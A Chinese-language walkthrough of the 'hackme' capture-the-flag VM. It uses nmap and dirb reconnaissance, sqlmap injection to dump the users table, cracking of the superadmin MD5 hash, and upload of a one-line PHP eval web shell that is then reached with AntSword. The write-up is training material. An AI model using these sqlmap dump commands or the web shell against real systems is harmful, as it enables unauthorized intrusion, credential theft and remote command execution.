1.安裝靶機
點擊? hackme.ova? ?文件,直接導入虛擬機,選擇存儲位置
2. 開啟靶機
3. kali掃描同C段的ip,找到靶機ip
nmap? 192.168.182.1/24
經判斷,靶機ip為:192.168.182.157
開啟端口 http 80? 、ssh 遠程連接 22?
4.? 瀏覽器訪問ip
顯示一個登錄界面,有輸入框,可能存在SQL注入? ? 存在注冊連接,后面可能會有用
5. kali的dirb掃描敏感目錄:dirb "http://ip"
6.訪問? index.php? ?和? /uploads/? 兩個網址
?index.php訪問仍是登錄界面
http://192.168.182.157/uploads/? ?發現上傳文件的目錄,無上傳位置,暫時沒思路操作
7. 返回登錄界面http://ip,注冊一個用戶,進行登錄
登錄成功,出現搜索框,嘗試sql注入
8.? 尋找注入
直接點擊search,發現彈出多個書籍信息,選一個作為值進行注入判斷過程
9.? 使用OSINT,使用BurpSuite抓包,保存數據包為txt文件
10. kali使用sqlmap工具爆破
爆破數據庫輸入:sqlmap -r '/home/kali/Desktop/test.txt' --dbs?
發現一個數據庫: webapphacking
爆破數據表:sqlmap -r '/home/kali/Desktop/test.txt' -D webapphacking --tables
發現users表
?爆破表數據:sqlmap -r '/home/kali/Desktop/test.txt' -D webapphacking -T users --dump
發現superadmin用戶,密碼:2386acb2cf356944177746fc92523983
32位,采用hash加密,嘗試md5解碼
md5解碼網址:MD5免費在線解密破解_MD5在線加密-SOMD5
密碼:Uncrackable
11.使用superadmin用戶登錄
退出賬號后,再重新登錄
出現上傳界面,結合之前的/uploads/可查看上傳文件的目錄,嘗試上傳木馬文件
12. 上傳一句話木馬文件進行嘗試
<?php @eval($_POST['cmd']);?>
?發現一句話木馬直接上傳成功
13.訪問/uploads/頁面,訪問該木馬文件
輸入:http://192.168.182.157/uploads/
點擊文件test1.php,進行訪問? ? 訪問成功
14. 蟻劍嘗試連接
連接成功,獲取了shell
?
hackme文件解析漏洞靶機,此次練習僅做到獲取shell。
練習到此結束,希望對各位有所幫助吧。僅供參考,有所不足請大家多見諒。
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ---------------2025/3/13? 23;45